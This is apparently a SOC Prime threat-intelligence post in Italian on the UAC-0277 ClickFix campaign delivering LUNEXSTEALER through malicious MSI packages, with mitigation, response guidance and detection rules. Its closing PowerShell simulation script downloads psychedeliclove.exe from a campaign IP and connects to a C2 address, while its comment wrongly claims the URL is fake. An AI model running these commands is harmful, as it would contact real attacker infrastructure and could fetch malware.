SOC Prime Bias: High

06 Oct 2026 14:30 UTC

Attacchi UAC-0277 Distribuiscono LUNEXSTEALER tramite MSI Malevoli e ClickFix

Author Photo
SOC Prime Team linkedin icon Segui
Attacchi UAC-0277 Distribuiscono LUNEXSTEALER tramite MSI Malevoli e ClickFix
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Sommario

Gli attori della minaccia tracciati come UAC-0277 stanno compromettendo siti web legittimi per iniettare JavaScript dannoso che attira gli utenti ad eseguire comandi tramite una falsa pagina di verifica Cloudflare. Questa tecnica ClickFix consegna infine pacchetti MSI contenenti LUNEXSTEALER o ulteriori loader che sfruttano BYOVD per eludere i controlli di sicurezza. La campagna utilizza anche un’infrastruttura di comando e controllo basata su blockchain su Polygon ed Ethereum per gestire dinamicamente le risorse degli aggressori.

Indagine

CERT-UA ha identificato più di 100 siti web compromessi e analizzato tre varianti MSI associate alla campagna. I ricercatori hanno osservato il side-loading DLL coinvolgendo FnHotkeyUtility.exe e lo sfruttamento del driver vulnerabile AMD PDFWKRNL.sys per bypassare le protezioni di Windows Defender. L’indagine ha anche rivelato l’estensione del browser LUNARAXE e il componente PowerShell NAIVEMESS utilizzati per raccogliere ed esfiltrare dati.

Mitigazione

Gli amministratori dovrebbero limitare l’accesso al dialogo Esegui (Win+R) tramite i criteri di gruppo e limitare i privilegi di installazione MSI agli utenti autorizzati. È essenziale abilitare la lista di blocco dei driver vulnerabili di Microsoft per ridurre il rischio di attacchi BYOVD. Le organizzazioni dovrebbero anche imporre delle allowlist per le estensioni del browser e monitorare l’attività della riga di comando di msiexec.exe sospetta che coinvolge URL remoti.

Risposta

Quando viene rilevata un’esecuzione MSI sospetta o estensioni del browser non autorizzate, isolare l’host interessato e terminare i processi associati a LUNEXSTEALER. Controllare le attività pianificate per voci nominate psychedelicloveUtils e ispezionare i profili del browser per l’estensione Microsoft Office Word Editor. Qualsiasi pagina di verifica Cloudflare falsa associata alla campagna dovrebbe essere segnalata a CERT-UA.

Flusso di Attacco

Rilevazioni

Voce RunMRU sospetta con semantica LOLBin (via registry_event)

Team SOC Prime
05 Ott 2026

Possibile tentativo di installazione di file MSI remoto (via cmdline)

Team SOC Prime
05 Ott 2026

Attività pianificata sospetta (via audit)

Team SOC Prime
05 Ott 2026

Download di file sospetto IP diretto (via proxy)

Team SOC Prime
05 Ott 2026

Comando e controllo sospetto tramite richiesta DNS di dominio di primo livello insolito (TLD) (via dns)

Team SOC Prime
05 Ott 2026

IOC (HashSha256) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 2

Regole AI SOC Prime
06 Ott 2026

IOC (HashSha256) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 1

Regole AI SOC Prime
06 Ott 2026

IOC (HashMd5) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 2

Regole AI SOC Prime
06 Ott 2026

IOC (HashMd5) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER Parte 1

Regole AI SOC Prime
06 Ott 2026

IOC (SourceIP) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER

Regole AI SOC Prime
06 Ott 2026

IOC (DestinationIP) per rilevare: Campagna UAC-0277: Distribuzione MSI dannosa tramite tecnica ClickFix e malware LUNEXSTEALER

Regole AI SOC Prime
06 Ott 2026

Rileva interazione con server C2 dannosi utilizzando HTTP e WebSocket [Connessione di rete Windows]

Regole AI SOC Prime
06 Ott 2026

FnHotkeyUtility esegue spkvol.dll dannoso tramite side-loading DLL [Windows Sysmon]

Regole AI SOC Prime
06 Ott 2026

Download di pacchetto MSI dannoso utilizzando Msiexec e sfruttamento di vulnerabilità [Creazione di processo Windows]

Regole AI SOC Prime
06 Ott 2026

Rileva JavaScript dannoso su siti web compromessi [Webserver]

Regole AI SOC Prime
06 Ott 2026

Esecuzione della simulazione

  • Narrazione dell’attacco e comandi: L’avversario ha eseguito con successo un compromesso drive-by. Per stabilire la persistenza e scaricare il malware di fase successiva, l’agente impiantato tenta di recuperare un file denominato psychedeliclove.exe da un URI specifico. Contemporaneamente, l’agente tenta di inviare segnali a un nodo C2 secondario situato a 193.178.159.128 sulla porta 8080 per ricevere istruzioni tramite una connessione HTTP simile a WebSocket. Questi indicatori specifici sono destinati a innescare le regole di rilevamento esistenti basate su proxy.

  • Script di test di regressione:

    # Script di simulazione per convalida della rilevazione
    # Scopo: Attivare gli indicatori URL e IP/Porto specifici nella regola di rilevamento.
    
    Write-Host "[*] Inizio simulazione..." -ForegroundColor Cyan
    
    # 1. Selezione attivazione 1: Modello URL dannoso
    Write-Host "[*] Tentativo di accesso al modello URL dannoso..." -ForegroundColor Yellow
    try {
        # Utilizziamo un listener locale inesistente o un URL falso per garantire di non colpire effettivamente un vero sito dannoso,
        # ma il proxy dovrebbe comunque registrare il tentativo di richiesta.
        Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue
    } catch {
        Write-Host "[!] Richiesta fallita (prevista), ma la telemetria dovrebbe essere generata." -ForegroundColor Gray
    }
    
    # 2. Selezione attivazione 2: IP e porta specifici
    Write-Host "[*] Tentativo di connessione all'IP C2 sulla porta 8080..." -ForegroundColor Yellow
    try {
        $client = New-Object System.Net.Sockets.TcpClient
        $client.Connect("193.178.159.128", 8080)
        $client.Close()
    } catch {
        Write-Host "[!] Connessione fallita (prevista), ma i log del proxy dovrebbero catturare il tentativo." -ForegroundColor Gray
    }
    
    Write-Host "[*] Simulazione completata." -ForegroundColor Cyan
  • Comandi di pulizia:

    # Nessun file persistente viene creato da questa simulazione.
    # Vengono tentate solo connessioni di rete temporanee.
    Write-Host "[*] Pulizia completata. Nessun artefatto lasciato nel sistema." -ForegroundColor Green